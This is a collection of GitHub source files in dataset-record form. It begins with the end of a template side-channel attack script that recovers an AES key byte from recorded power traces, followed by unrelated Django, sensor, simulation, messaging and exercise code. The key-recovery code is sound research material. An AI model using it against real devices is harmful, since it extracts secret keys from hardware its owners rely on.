min(nextPOI + poi_spacing, len(tempSumDiff))\n for j in range(poiMin, poiMax):\n tempSumDiff[j] = 0\n # Fill up mean and covariance matrix for each HW\n self.mean_matrix = np.zeros((self.leak_range, num_pois))\n self.cov_matrix = np.zeros((self.leak_range, num_pois, num_pois))\n for mid in range(self.leak_range):\n for i in range(num_pois):\n # Fill in mean\n self.mean_matrix[mid][i] = tempMeans[mid][self.pois[i]]\n for j in range(num_pois):\n x = temp_traces_lm[mid][:, self.pois[i]]\n y = temp_traces_lm[mid][:, self.pois[j]]\n self.cov_matrix[mid, i, j] = cov(x, y)\n print(\"The template has been created.\")\n return\n\n def attack(self, traces, plaintext):\n rank_key = np.zeros(256)\n for j, trace in enumerate(traces):\n # Grab key points and put them in a small matrix\n a = [trace[poi] for poi in self.pois]\n\n # Test each key\n for k in range(256):\n # Find leak model coming out of sbox\n mid = self.leak_model[SBOX[plaintext[j] ^ k]]\n\n # Find p_{k,j}\n # print(np.linalg.det(self.cov_matrix[mid]))\n rv = multivariate_normal(self.mean_matrix[mid], self.cov_matrix[mid], allow_singular=True)\n p_kj = PRE[mid] * rv.pdf(a)\n\n # Add it to running total\n rank_key[k] += np.log(p_kj)\n\n guessed = rank_key.argsort()[-1]\n print(\"Key found: %d\" % guessed)\n return self.mean_matrix, self.cov_matrix, guessed\n\n\nif __name__ == '__main__':\n # Setting for data operation, the REAL KEY is 66\n filename = r'mega128a5V4M_origin'\n path = r'./data'\n trace_num = 10000\n train_key = 66\n\n # Transfer trs to npz\n trs2Npz(path, filename, filename, trace_num)\n target = np.load(path + '\\\\' + filename + '.npz')\n raw_traces = target[\"trace\"]\n plaintexts = target[\"crypto_data\"]\n\n # Normalization on raw data traces\n traces = standardize(raw_traces)\n\n # If you need PCA, uncomment this\n pca = PCA(traces, explain_ratio=0.95)\n traces = pca.proj(traces)\n\n # Train set\n num_train = 9800\n train_tr = traces[:num_train, :]\n train_pt = plaintexts[:num_train]\n # 
Attack set\n attack_tr = traces[num_train:, :]\n attack_pt = plaintexts[num_train:]\n\n # Get a TA attacker\n ta = TA(traces=train_tr, plain_texts=train_pt, real_key=train_key, num_pois=5)\n mean_matrix, cov_matrix, guessed = ta.attack(attack_tr, attack_pt)\n","repo_name":"itewqq/TemplateSideChannelAttack","sub_path":"ta.py","file_name":"ta.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"13628638001","text":"from django.db.models import Q\nfrom django.http import JsonResponse\n\nfrom dgsys2.models import *\nfrom datetime import date, datetime\n\n\ndef occupied_response():\n return JsonResponse({'error': 'Selected equipment is occupied'}, status=412)\n\n\ndef equipment_is_available(equipmentIds, from_date, to_date, include_reservations=True):\n available = True\n\n for eq_id in equipmentIds:\n rentals = Rental.objects.filter(\n equipment_articles__id=eq_id,\n start_date__lt=to_date,\n end_date__gt=from_date\n ).count()\n\n if rentals > 0:\n available = False\n\n if include_reservations and available:\n reservations = Reservation.objects.filter(\n equipment_articles__id=eq_id,\n start_date__lt=to_date,\n end_date__gt=from_date\n ).count()\n\n if reservations > 0:\n available = False\n\n return available\n\n\ndef serializeEquipment(item, request, from_date=None, to_date=None):\n price = EquipmentPrice.objects.filter(\n equipment_article__id=item.id,\n membership=request.user.membership\n ).values('price')[0]['price']\n\n occupants = \"\"\n\n is_rented = False\n is_reserved = False\n\n if from_date is not None and to_date is not None:\n print()\n rentees = Rental.objects.filter(\n Q(end_date__gt=from_date) | Q(end_date__isnull=True),\n equipment_articles__label=item.label,\n start_date__lt=to_date\n ).values(\"user__first_name\", \"user__last_name\").distinct()\n is_rented = rentees.count() > 0\n\n reservators = Reservation.objects.filter(\n equipment_articles__label=item,\n start_date__lt=to_date,\n end_date__gt=from_date\n ).values(\"user__first_name\", \"user__last_name\").distinct()\n is_reserved = reservators.count() > 0\n\n occupants_qs = reservators.union(rentees).distinct()\n\n for o in occupants_qs:\n if len(occupants) > 0:\n occupants += \", \"\n occupants += o['user__first_name'] + \" \" + o['user__last_name'][0]\n\n item_dict = {\n 'category': item.category.label,\n 'category_id': item.category_id,\n 'id': item.id,\n 'description': item.description,\n 'label': item.label,\n 'price': price,\n 'occupants': occupants,\n 'is_reserved': is_reserved,\n 'is_rented': is_rented\n }\n\n return item_dict\n\n\ndef total_rental_price(user, items, start_date, end_date):\n start_date = start_date.replace(tzinfo=None)\n end_date = end_date.replace(tzinfo=None)\n\n date_difference = end_date - start_date\n\n if date_difference.days > 2 and user.membership.id == 2:\n membership = Membership.objects.get(pk=3)\n else:\n membership = user.membership\n\n days_rented = date_difference.days + 1\n\n total_price = 0\n\n for item in items:\n item_price = EquipmentPrice.objects.get(\n equipment_article=item,\n membership=membership\n ).price\n\n total_price += item_price * days_rented\n\n return total_price\n\n\ndef upgrade_if_eligible(user):\n if user.is_member():\n intervals = select_semester(date.today())\n end_date = intervals['end']\n start_date = intervals['start']\n rentals_this_semester = Rental.objects.filter(\n user=user,\n end_date__gte=start_date,\n end_date__lte=end_date,\n ).count()\n\n if 
rentals_this_semester >= 5:\n            user.membership = Membership.objects.get(pk=3)\n            user.save()\n            return True\n    return False\n\n\ndef select_semester(check_date: date):\n    current_year = date.today().year\n    if date(current_year, 9, 1) <= check_date <= date(current_year, 12, 31):\n        return {'start': datetime(current_year, 9, 1), 'end': datetime(current_year, 12, 31)}\n    else:\n        return {'start': datetime(current_year, 1, 1), 'end': datetime(current_year, 8, 31)}\n\n\ndef reset_plus_memberships():\n    plus_members = User.objects.filter(membership=3)\n    for member in plus_members:\n        member.membership = Membership.objects.get(pk=2)\n        member.save()\n\n\ndef serialized_items(user):\n    membership = user.membership\n    itemset = Item.objects.all()\n    result = []\n    for item in itemset:\n        try:\n            price = ItemPrice.objects.get(\n                item=item,\n                membership=membership\n            )\n            print(price)\n            result.append({\n                'id': item.id,\n                'label': item.label,\n                'price': price.price,\n                'rental_related': item.rental_related,\n                'price_per_unit': item.price_per_unit\n            })\n        except ItemPrice.DoesNotExist:\n            result.append({\n                'id': item.id,\n                'label': item.label,\n                'price': 0,\n                'rental_related': item.rental_related,\n                'price_per_unit': item.price_per_unit\n            })\n\n    return result\n","repo_name":"jonasbjoralt/dgsys2_server","sub_path":"dgsys2/view_utils.py","file_name":"view_utils.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"37926358725","text":"\nfrom binascii import a2b_hex\nfrom inkfish.create_discriminant import create_discriminant\nfrom inkfish.classgroup import ClassGroup\n\n\ndef judge_entry(mystr):\n    assert len(mystr) < 100000\n    lines = mystr.strip().split(b'\\n')\n    assert len(lines) == 3\n    ds = set()\n    for line in lines:\n        # File format:\n        # challenge(in hex) length a b c order\n        vals = [x.strip() for x in line.strip().split(b' ')]\n        assert len(vals) == 6\n        length = int(vals[1])\n        assert length < 5000\n        assert all(len(x) < length for x in vals[2:])\n        assert len(vals[0]) <= 32\n        d = create_discriminant(a2b_hex(vals[0]), length)\n        g = ClassGroup(int(vals[2]), int(vals[3]), int(vals[4]))\n        assert g.discriminant() == d\n        assert g != g.identity()\n        order = int(vals[5])\n        assert order > 1\n        assert g ** order == g.identity()\n        assert d not in ds\n        ds.add(d)\n    return -max(ds)\n\n\nif __name__ == '__main__':\n    from sys import argv\n    h = open(argv[1], 'rb')\n    s = h.read()\n    h.close()\n    print(judge_entry(s))\n","repo_name":"Chia-Network/oldvdf-competition","sub_path":"tools/judge_entry.py","file_name":"judge_entry.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"21"}
{"seq_id":"8637743724","text":"import sys\nsys.stdin = open('3408.세가지 합 구하기_input.txt')\n\nT = int(input())\n\nfor tc in range(1, T+1):\n    N = int(input())\n\n    S1 = ( N * (N+1) ) // 2\n    S2 = N ** 2\n    S3 = N * (N+1)\n    \n    print(\"#{} {} {} {}\".format(tc, S1, S2, S3))","repo_name":"jade-min/Algorithm","sub_path":"SWEA/D3/3408.세가지 합 구하기_2nd.py","file_name":"3408.세가지 합 구하기_2nd.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"17820198695","text":"\nimport sys\nsys.path.insert(0, 'libs')\nfrom collections import Counter\nfrom datetime import *\n\nimport logging\nfrom google.appengine.ext import db\n\nimport pytz\n\nfrom models import *\n\n\ndef get_progress_stats():\n    
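# Accumulate [label, value] rows that summarize how far the class/enrollment crawl has progressed.\n    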
progress_stats = []\n\n # get all classes\n query = Class.all()\n class_obj_list = query.fetch(1000)\n class_count = len(class_obj_list)\n\n progress_stats.append(['Number of Classes Queried', 1000])\n progress_stats.append(['Number of Classes Found', class_count])\n\n past_class_count = 0\n future_class_count = 0\n utc = pytz.UTC\n for class_obj in class_obj_list:\n class_datetime = utc.localize(class_obj.date_time)\n if class_datetime > datetime.now(pytz.utc):\n future_class_count = future_class_count + 1\n if class_datetime <= datetime.now(pytz.utc):\n past_class_count = past_class_count + 1\n\n progress_stats.append(['Number of Past Classes', past_class_count])\n progress_stats.append(['Number of Future Classes', future_class_count])\n\n # get all the classes that have been checked\n query = ClassesChecked.all()\n classes_checked_obj_list = query.fetch(1000)\n classes_checked_count = len(classes_checked_obj_list)\n classes_checked_percent = round((float(classes_checked_count) / class_count) * 100)\n\n progress_stats.append(['Percent of Classes Checked for Enrollments', classes_checked_percent])\n\n # get all enrollments\n query = Enrollment.all()\n enrollment_obj_list = query.fetch(1000)\n enrollment_count = len(enrollment_obj_list)\n\n progress_stats.append(['Number of Enrollments Queried', 1000])\n progress_stats.append(['Number of Enrollments Found', enrollment_count])\n\n # count grades checked relation\n query = GradesChecked.all()\n grades_checked_obj_list = query.fetch(1000)\n grades_checked_count = len(grades_checked_obj_list)\n\n progress_stats.append(['Number of Checked Grades Queried', 1000])\n progress_stats.append(['Number of Checked Grades Found', grades_checked_count])\n\n # get all enrollment times\n reg_time_list = []\n for enrollment in enrollment_obj_list:\n reg_time_list.append(enrollment.enrollment_date_time)\n\n\n # get all the enrollments that have grades\n enrollment_not_graded_count = 0\n for enrollment in enrollment_obj_list:\n if enrollment.test_score == 0:\n enrollment_not_graded_count = enrollment_not_graded_count + 1\n\n enrollment_not_graded_percent = round((float(enrollment_not_graded_count) / enrollment_count) * 100)\n\n progress_stats.append(['Percent of Enrollments Not Graded', enrollment_not_graded_percent])\n\n # compare enrollment date to grade\n data_point_list = []\n query = Enrollment.all()\n query.filter('test_score !=', 0)\n enrollment_graded_obj_list = query.fetch(100)\n for enrollment in enrollment_graded_obj_list:\n class_obj = Class.get_by_key_name(enrollment.class_key_name)\n td = class_obj.date_time - enrollment.enrollment_date_time\n data_point_list.append([round(td.total_seconds() / (24*60*60)), int(enrollment.test_score)])\n\n\n return {\n 'progress_stats': progress_stats,\n 'data_point_list': data_point_list,\n }\n\n\n\ndef get_progress_stats(info_to_breakdown):\n # get list of zip codes \n query = Student.all()\n query.filter('zip_code !=', 0)\n student_obj_list = query.fetch(1000)\n zip_code_count = len(student_obj_list)\n zip_code_list = []\n for student in student_obj_list:\n zip_code_list.append(student.zip_code[:5])\n\n zip_code_dist = Counter(zip_code_list)\n\n\n zip_code_dist_percents = []\n for key in zip_code_dist.keys():\n percent = round(float(zip_code_dist[key] * 100) / zip_code_count)\n zip_code_dist_percents.append([\"'\" + key + \"'\", percent])\n\n logging.info(zip_code_dist)\n\n return {\n 'zip_code_dist': zip_code_dist_percents,\n 
}\n","repo_name":"logston/cpr123-enrollment-watcher","sub_path":"view_subroutines.py","file_name":"view_subroutines.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3959739666","text":"from mpl_toolkits import mplot3d\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\nimport argparse\n\n\ndef ham_product(q1, q2):\n \"\"\" Returns Hamilton product q1q2 for two quaternions\n https://en.wikipedia.org/wiki/Quaternion#Hamilton_product\n \"\"\"\n prod = np.empty(4)\n prod[0] = q1[0]*q2[0] - q1[1]*q2[1] - q1[2]*q2[2] - q1[3]*q2[3]\n prod[1] = q1[0]*q2[1] + q1[1]*q2[0] + q1[2]*q2[3] - q1[3]*q2[2]\n prod[2] = q1[0]*q2[2] - q1[1]*q2[3] + q1[2]*q2[0] + q1[3]*q2[1]\n prod[3] = q1[0]*q2[3] + q1[1]*q2[2] - q1[2]*q2[1] + q1[3]*q2[0]\n return prod\n\n\ndef vec_quat_mult(vec, quat):\n \"\"\" Multiplies vector3 vec by unit quaternion quat and returns the \n resulting rotated vector\n \"\"\"\n vec_extended = np.concatenate((0, vec), axis=None)\n quat_inverse = np.array([quat[0], -quat[1], -quat[2], -quat[3]])\n final_prod = ham_product(ham_product(quat, vec_extended), quat_inverse)\n return final_prod[1:4]\n\n\ndef quat_from_axis_angle(axis, angle):\n \"\"\"Angle should be in radians CCW\n \"\"\"\n quat = np.empty(4)\n quat[0] = np.cos(angle/2)\n quat[1:4] = np.sin(angle/2) * axis\n return quat / np.linalg.norm(quat)\n\n\ndef update_sensor(frame_num, heading_data, axes_plot):\n axes_plot.set_data(heading_data[0:2, :frame_num+1])\n axes_plot.set_3d_properties(heading_data[2, :frame_num+1])\n return axes_plot\n\n\ndef quaternions_from_gyro(filename, verbose, line_offset, max_lines):\n quat_list = []\n prev_transf = np.array([1,0,0,0])\n basis_vecs = np.array([[1.,0,0],[0,1.,0],[0,0,1.]]) # These have to be explicity declared as floats\n with open(filename) as f:\n lines = f.readlines()[0:max_lines]\n print(\"Number of lines read: {0}\".format(len(lines)))\n for line in lines:\n data_points = line.split(' ')\n if data_points[0] == \"#\":\n continue\n first_col = line_offset if line_offset else 0\n # Why multiply by a factor of 33/10^6? 
\n # We divide by 1000 because the data is all multiplied by 1000 to convert floats to ints\n # Then we multiply by 33/1000 because the units are radians/sec and 33/1000 seconds have passed.\n gyro_vals = [float(data_points[first_col+i]) * (33.0 / 1000.0**2) for i in range(3)]\n if verbose:\n print(\"gyro vals: \", gyro_vals)\n\n # The first thing to notice is that all rotation is ~double-counted.\n # For example, moving perpendicular to the x-axis is rotation around\n # the z-axis and around the y-axis.\n quats = [quat_from_axis_angle(basis_vecs[i], 0.5 * gyro_vals[i]) for i in range(3)]\n curr_transf = ham_product(ham_product(quats[0], quats[1]), quats[2])\n \n curr_transf = ham_product(curr_transf, prev_transf)\n prev_transf = curr_transf\n quat_list.append(curr_transf)\n return quat_list\n\n\ndef madgwick_estimate(q_curr, gyro_data, elapsed_time):\n \"\"\"Implements the technique in the Madgwick paper using only gyro data.\n The only difference between this and the graph-gyro-data.py implementation \n is that we put all the gyro data into one quaternion instead of composing\n rotations.\n params:\n q_curr: current orientation quaternion in w,x,y,z form\n gyro_data: gyro data in x,y,z radians/second\n elapsed_time: time between readings in seconds\n \"\"\"\n q_gyro = np.zeros(4)\n q_gyro[1:4] = gyro_data\n q_dot = ham_product(q_curr, q_gyro) * 0.5\n q_new = q_curr + (q_dot * elapsed_time)\n return q_new / np.linalg.norm(q_new)\n\n\ndef madgwick_quat_from_gyro(filename, verbose, line_offset, max_lines):\n quat_list = []\n prev_transf = np.array([1,0,0,0])\n basis_vecs = np.array([[1.,0,0],[0,1.,0],[0,0,1.]]) # These have to be explicity declared as floats\n with open(filename) as f:\n lines = f.readlines()[0:max_lines]\n print(\"Number of lines read: {0}\".format(len(lines)))\n for line in lines:\n data_points = line.split(' ')\n if data_points[0] == \"#\":\n continue\n first_col = line_offset if line_offset else 0\n # All values from the data are divided by 1000.0 because they were\n # multiplied by 1000 to convert from int to float.\n gyro_vals = [float(data_points[first_col+i]) * (1 / 1000.0) for i in range(3)]\n gyro_vals = np.array(gyro_vals)\n\n curr_transf = madgwick_estimate(prev_transf, gyro_vals, 33.0/1000)\n \n prev_transf = curr_transf\n quat_list.append(curr_transf)\n return quat_list\n\n\n\nif __name__=='__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"file\", help=\"Filepath of the data to use\")\n parser.add_argument(\"--offset\", \"--o\", help=\"Number of columns into the data file to start reading\", type=int)\n parser.add_argument(\"--maxlines\", \"--max\", help=\"Max number of rows to read from file\", type=int)\n parser.add_argument(\"--verbose\", \"--v\", help=\"Use to enable print statements\", action=\"store_true\")\n args = parser.parse_args()\n\n x_vec = np.array([1,0,0])\n z_vec = np.array([0,0,1])\n\n # It is not clear whether the gyro data is in degrees or radians so I am going to\n # check by reading the values.\n # Update: Since we rotate at a rate of no more than 1.15 units / sec, \n # it's probably radians.\n\n # quat_list = []\n # prev_transf = np.array([1,0,0,0])\n # basis_vecs = np.array([[1.,0,0],[0,1.,0],[0,0,1.]]) # These have to be explicity declared as floats\n # with open(args.file) as f:\n # lines = f.readlines()[0:args.maxlines]\n # print(\"Number of lines read: {0}\".format(len(lines)))\n # for line in lines:\n # data_points = line.split(' ')\n # if data_points[0] == \"#\":\n # continue\n # first_col = args.offset if 
args.offset else 0\n # # Why multiply by a factor of 33/10^6? \n # # We divide by 1000 because the data is all multiplied by 1000 to convert floats to ints\n # # Then we multiply by 33/1000 because the units are radians/sec and 33/1000 seconds have passed.\n # gyro_vals = [float(data_points[first_col+i]) * (33.0 / 1000.0**2) for i in range(3)]\n # if args.verbose:\n # print(\"gyro vals: \", gyro_vals)\n\n # # The first thing to notice is that all rotation is ~double-counted.\n # # For example, moving perpendicular to the x-axis is rotation around\n # # the z-axis and around the y-axis.\n # quats = [quat_from_axis_angle(basis_vecs[i], 0.5 * gyro_vals[i]) for i in range(3)]\n # curr_transf = ham_product(ham_product(quats[0], quats[1]), quats[2])\n \n # curr_transf = ham_product(curr_transf, prev_transf)\n # prev_transf = curr_transf\n # quat_list.append(curr_transf)\n data_quats = madgwick_quat_from_gyro(args.file, args.verbose, args.offset, args.maxlines)\n\n x_vec = np.array([1,0,0])\n x_orientations = []\n for quat in data_quats:\n x_curr = vec_quat_mult(x_vec, quat)\n x_orientations.append(x_curr)\n \n x_pts = np.array(x_orientations).T\n if args.verbose:\n print(\"x_pts:\", x_pts)\n fig = plt.figure()\n ax = plt.axes(projection='3d')\n pos_plot = ax.plot(x_pts[0], x_pts[1], x_pts[2], label='Position of sensor')[0]\n # plt.plot(times, angles)\n # plt.show()\n\n millisecond_interval = 33\n line_ani = animation.FuncAnimation(fig, update_sensor, frames=len(x_pts[0]), fargs=(x_pts, pos_plot), interval=millisecond_interval)\n plt.show()","repo_name":"jpiland16/hmv-scratchpad","sub_path":"data-playground/old_scripts/graph-gyro-data.py","file_name":"graph-gyro-data.py","file_ext":"py","file_size_in_byte":7695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34582602652","text":"# -*- coding: utf-8 -*-\n# Ohjelma mittaa lämpötilan ja kosteuden ja päivittää tiedot\n# Google Drivessä olevaan taulukkoon.\nimport gspread\nimport Adafruit_DHT\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom datetime import datetime\n\n# Sensori on mallia DHT11\nsensori = Adafruit_DHT.DHT11\n\npin = 23\t# Sääanturin datan sisääntulo\n\n# Sensori yrittää lukea dataa 15 kertaa kahden sekunnin välein\nkosteus, temp = Adafruit_DHT.read_retry(sensori, pin)\n\nif kosteus is not None and temp is not None:\n\n\t# Ottaa yhteyden Google Driveen tunnistiedoilla\n\tscope = ['https://www.googleapis.com/auth/drive']\n\tcreds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)\n\tclient = gspread.authorize(creds)\n\n\t# Avataan Temperature taulukon ensimmäinen välilehti\n\tsheet = client.open(\"Temperature\").sheet1\n\n\t# Lisätään uusi rivi edellisten jälkeen\n\trow = [datetime.now().strftime('%Y-%m-%d %H:%M:%S'),temp,kosteus]\n\tsheet.append_row(row)","repo_name":"anttiheimonen/tiea345","sub_path":"Demo3/d3t2.py","file_name":"d3t2.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22904016152","text":"# Adamın çözdüğü\n# Çözüm sayısı 0 | Hedef 5 çözüm\nclass Solution(object):\n def isSubsequence(self, s, t):\n i, j = 0, 0\n \n while len(s) > i and len(t) > j:\n if len(s) > i and s[i] == t[j]:\n i += 1\n j += 1\n \n return len(s) == i\n ","repo_name":"merthamit/Over-300-leetcode-solutions","sub_path":"leetcodes 
questions/392.py","file_name":"392.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"24917142216","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# multi-asset jump diffusion model\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass multiJumpDiffusion:\n\n def __init__(self, m=None, spot_init=None, T=None, N=None, cov=None, prob1=None, prob2=None):\n\n self.m = m\n self.spot_init = spot_init\n self.T = T\n self.N = N\n self.cov = cov\n self.prob1 = prob1\n self.prob2 = prob2\n\n def gen_process(self):\n\n dt = self.T / self.N\n sigma = np.zeros(2)\n processes = np.zeros((self.N, 2))\n processes[0, :] = np.log(self.spot_init)\n\n drift = np.zeros(2)\n diffusion = np.zeros(2)\n\n for i in range(1, self.N):\n z1 = np.random.normal(0, 1)\n sigma[0] = np.sqrt(cov[0, 0])\n sigma[1] = np.sqrt(cov[1, 1])\n\n drift = 0.5 * (sigma ** 2) * dt\n diffusion = np.sqrt(self.T / self.N) * np.matmul(np.linalg.cholesky(self.cov),\n np.random.normal(0, 1, size=2))\n jump = self.gen_jump(sigma[0], sigma[1])\n\n processes[i, :] = processes[i - 1, :] - drift + diffusion + jump\n\n return np.exp(processes)\n\n def gen_jump(self, sigma1=None, sigma2=None):\n\n jump = np.zeros(2)\n a1 = np.zeros(2)\n a2 = np.zeros(2)\n a3 = np.zeros(2)\n zero = np.zeros(2)\n\n a1[:] = 0\n a2[:] = 0\n a3[:] = 0\n\n z = np.zeros(3)\n z[0] = 1\n z[1] = 2\n z[2] = 3\n\n val = np.random.choice(z, 1, p=[1 - self.prob1 - self.prob2, self.prob1, self.prob2])\n\n if val == 1:\n jump = (self.m * np.random.exponential() + np.sqrt(np.random.exponential()) * np.random.multivariate_normal(\n zero, self.cov))\n elif val == 2:\n jump = [\n sigma1 * np.random.exponential() + np.sqrt(np.random.exponential()) * np.random.normal(0, sigma1 ** 2),\n 0]\n elif val == 3:\n jump = [0, sigma2 * np.random.exponential() + np.sqrt(np.random.exponential()) * np.random.normal(0,sigma2 ** 2)]\n\n return np.random.poisson(1 * self.T / self.N, size=2) * jump\n\n def gen_path(self, nbPaths=None):\n\n dt = np.divide(self.T, self.N)\n dualPaths = np.zeros(((nbPaths, self.N, 2)))\n\n for i in range(nbPaths):\n dualPaths[i, :, :] = self.gen_process()\n\n return dualPaths\n\nm = np.array([0.1, 0.2])\nspot_init = np.array([100, 100])\nT = 1\nN = 30\ncov = np.array([[0.1, 0.05], [0.05, 0.1]])\nprob1 = 0.2\nprob2 = 0.2\n\ntest = multiJumpDiffusion(m=m, spot_init=spot_init, T=T, N=N, cov=cov, prob1=prob1, prob2=prob2)\nhihi = test.gen_path(1)\n# working fine\n","repo_name":"eidonia/rainbow-deep-hedging","sub_path":"dynamics/multiJumpDiffusion.py","file_name":"multiJumpDiffusion.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"41726454562","text":"# Tugas Dasar Dasar Pemgragraman - Tugas ke 5\n# Oleh Febry Billiyagi Karsidi dari TI02\n# Program menghitung Luas & Keliling dari Jajargenjang\n\nprint('''\nProgram menghitung Luas & Keliling Jajargenjang, pilih salah satu nomor\n1). Luas\n2). 
Keliling\n''')\nchoosenMenu = int(input(': '))\n\nif choosenMenu == 1:\n print(\"Operasi menghitung Luas jajargenjang\")\n alas = int(input(\"Alas: \"))\n tinggi = int(input(\"Tinggi: \"))\n result = alas * tinggi\n print('hasilnya adalah: ', result)\nelif choosenMenu == 2:\n print(\"Operasi menghitung Keliling jajargenjang\")\n alas = int(input(\"Alas: \"))\n tinggi = int(input(\"Sisi miring: \"))\n result = 2 * (alas+tinggi)\n print('hasilnya adalah: ', result)\nelse: \n print(\"Terjadi Kesalahan, Ulangi Program\")","repo_name":"billiyagi/myPython","sub_path":"DDP Tugas 5/DDP-Luas dan keliling Jajargenjang-Febry Billiyagi Karsidi-TI02.py","file_name":"DDP-Luas dan keliling Jajargenjang-Febry Billiyagi Karsidi-TI02.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"7541512153","text":"import json\nimport os\nfrom ..base_translation_client import BaseTranslationClient\nfrom volcengine.ApiInfo import ApiInfo\nfrom volcengine.Credentials import Credentials\nfrom volcengine.ServiceInfo import ServiceInfo\nfrom volcengine.base.Service import Service\n\n\nclass HuoShanTranslationClient(BaseTranslationClient):\n\n access_key: str\n secret_key: str\n service_info: ServiceInfo\n query: dict[str, str]\n api_info: dict\n service: Service\n\n def __init__(self) -> None:\n\n self.access_key = os.environ.get(\"HUO_SHAN_ACCESS_KEY\")\n self.secret_key = os.environ.get(\"HUO_SHAN_SECRET_KEY\")\n self.service_info = ServiceInfo('translate.volcengineapi.com',\n {'Content-Type': 'application/json'},\n Credentials(self.access_key, self.secret_key,\n 'translate', 'cn-north-1'),\n 5,\n 5)\n self.query = {\n 'Action': 'TranslateText',\n 'Version': '2020-06-01'\n }\n self.api_info = {\n 'translate': ApiInfo('POST', '/', self.query, {}, {})\n }\n self.service = Service(self.service_info, self.api_info)\n\n def translation(self, text: str, target_language: str) -> str:\n body = {\n 'TargetLanguage': target_language,\n 'TextList': [text],\n }\n res = self.service.json('translate', {}, json.dumps(body))\n res = json.loads(res)\n translation = res[\"TranslationList\"][0][\"Translation\"]\n return translation\n","repo_name":"yakami129/VirtualWife","sub_path":"domain-chatbot/apps/speech/translation/huoshan/huoshan_translation_client.py","file_name":"huoshan_translation_client.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":535,"dataset":"github-code","pt":"21"} +{"seq_id":"4825381664","text":"import pika\r\nimport time\r\n\r\ncredentials = pika.PlainCredentials('huotong', '123456')\r\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\r\n 'localhost', credentials=credentials))\r\nchannel = connection.channel()\r\n\r\n# 声明queue\r\nchannel.queue_declare(queue='task_queue', durable=True)\r\n\r\n# n RabbitMQ a message can never be sent directly to the queue, it always needs to go through an exchange.\r\nimport sys\r\n\r\nmessage = ' '.join(sys.argv[1:]) or \"Hello World! 
%s\" % time.time()\r\n\r\nchannel.basic_publish(exchange='',\r\n routing_key='task_queue',\r\n body=message,\r\n properties=pika.BasicProperties(\r\n delivery_mode=2, # make message persistent\r\n )\r\n\r\n )\r\nprint(\" [x] Sent %r\" % message)\r\nconnection.close()\r\n","repo_name":"huotong1212/mylearnpy","sub_path":"pythoin面试准备/rabbitdemo/send_msg_safe.py","file_name":"send_msg_safe.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"39609543016","text":"from typing import Dict, List\n\nfrom domain import utils\nfrom domain.enums import Language\nfrom domain.evaluations import Evaluation, Question\nfrom infra.repositories.general_repository import AINTERVIEWER_CLIENT\n\nEVALUATIONS_COLLECTION = AINTERVIEWER_CLIENT.evaluations\n\n\ndef insert_evaluation(evaluation: Evaluation):\n EVALUATIONS_COLLECTION.insert_one(evaluation.to_dict())\n\n\ndef find_evaluation_by_id(evaluation_id: str):\n evaluation_data = EVALUATIONS_COLLECTION.find_one({'_id': evaluation_id})\n if evaluation_data:\n return deserialize_evaluation(evaluation_data)\n\n\ndef find_evaluations_by_project_id(project_id: str) -> List[Evaluation]:\n evaluations = []\n evaluation_list = EVALUATIONS_COLLECTION.find({'project_id': project_id})\n for evaluation_data in evaluation_list:\n evaluations.append(deserialize_evaluation(evaluation_data))\n\n return evaluations\n\n\ndef update_evaluation(evaluation: Evaluation):\n EVALUATIONS_COLLECTION.update_one(\n {'_id': evaluation.id},\n {'$set': {\n 'name': evaluation.name,\n 'description': evaluation.description,\n 'language': evaluation.language.name,\n 'questions': [question.to_dict() for question in\n evaluation.questions] if evaluation.questions else None\n }}\n )\n\n\ndef deserialize_evaluation(evaluation_data: Dict) -> Evaluation:\n return Evaluation(\n id=evaluation_data.get('_id'),\n project_id=evaluation_data.get('project_id'),\n name=evaluation_data.get('name'),\n description=evaluation_data.get('description'),\n language=Language[evaluation_data.get('language')],\n questions=deserialize_questions(evaluation_data.get('questions')) if evaluation_data.get(\n 'questions') else None\n )\n\n\ndef deserialize_questions(questions_list_data: List):\n questions = []\n for question_data in questions_list_data:\n questions.append(\n Question(\n id=question_data.get('_id'),\n text=question_data.get('text'),\n mandatory=question_data.get('mandatory'),\n time_to_respond=utils.get_time_from_str(question_data.get('time_to_respond')),\n )\n )\n\n return questions\n","repo_name":"AInterviewer/ainterviewer_services","sub_path":"src/infra/repositories/evaluation_repository.py","file_name":"evaluation_repository.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73026916853","text":"import sys; sys.path.insert(0, '../../')\nimport geoplot as gplt\nimport geopandas as gpd\nimport matplotlib.pyplot as plt\nfrom shapely.geometry import Point\nimport pandas as pd\nimport mplleaflet\n\n\n# 